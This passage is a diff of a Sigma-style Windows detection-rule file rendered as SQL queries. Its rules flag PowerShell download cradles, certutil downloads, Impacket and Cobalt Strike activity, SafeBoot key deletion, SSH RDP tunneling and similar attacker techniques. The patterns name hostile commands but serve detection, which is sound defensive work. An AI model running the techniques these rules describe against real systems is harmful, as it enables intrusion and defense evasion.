"status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unknown" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. 
This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Scripts or tools that download files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "PowerShell Script Run in AppData", - "id": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", "status": "experimental", - "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Administrative scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%powershell.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\pwsh%' ESCAPE '\\' OR CommandLine LIKE '%pwsh.exe%' ESCAPE '\\') AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Roaming\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' 
AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_ps_appdata.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. 
Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_apt_slingshot.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", - "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", "tags": [ "attack.execution", + "attack.t1047", "attack.lateral_movement", - "attack.t1072" + 
"attack.t1021.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Scheduled Task Name As GUID", + "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", + "description": "Detects creation of a scheduled task with a GUID like name", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Legitimate software naming their tasks as GUIDs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID 
= '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' OR Product = '3CX Desktop App') AND FileVersion LIKE '%18.12.%' ESCAPE '\\') OR ((Hashes LIKE '%SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA%' ESCAPE '\\' OR Hashes LIKE '%MD5=BB915073385DD16A846DFA318AFA3C19%' ESCAPE '\\' OR Hashes LIKE '%MD5=08D79E1FFFA244CC0DC61F7D2036ACA9%' ESCAPE '\\' OR Hashes LIKE '%MD5=4965EDF659753E3C05D800C6C8A23A7A%' ESCAPE '\\' OR Hashes LIKE '%SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203%' ESCAPE '\\' OR Hashes LIKE '%SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB%' ESCAPE '\\' OR Hashes LIKE '%SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5%' ESCAPE '\\' OR Hashes LIKE '%MD5=9833A4779B69B38E3E51F04E395674C6%' ESCAPE '\\' OR Hashes LIKE '%MD5=704DB9184700481A56E5100FB56496CE%' ESCAPE '\\' OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": 
"proc_creation_win_schtasks_guid_task_name.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 
encoded Shellcode", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "status": "test", + "description": "Detects a service binary running in a suspicious directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "Java Running with Remote Debugging", - "id": "8f88e3f6-2a49-48f5-a5c4-2f7eedf78710", + "title": "Suspicious Download Via Certutil.EXE", + "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", "status": "test", - "description": "Detects a JAVA process running with remote debugging allowing more than just localhost to connect", - "author": "Florian Roth (Nextron Systems)", + 
"description": "Detects the execution of certutil with certain flags that allow the utility to download files.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%transport=dt\\_socket,address=%' ESCAPE '\\' AND (CommandLine LIKE '%jre1.%' ESCAPE '\\' OR CommandLine LIKE '%jdk1.%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%address=127.0.0.1%' ESCAPE '\\' OR CommandLine LIKE '%address=localhost%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_java_remote_debugging.yml" + "filename": "proc_creation_win_certutil_download.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE 
'%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 
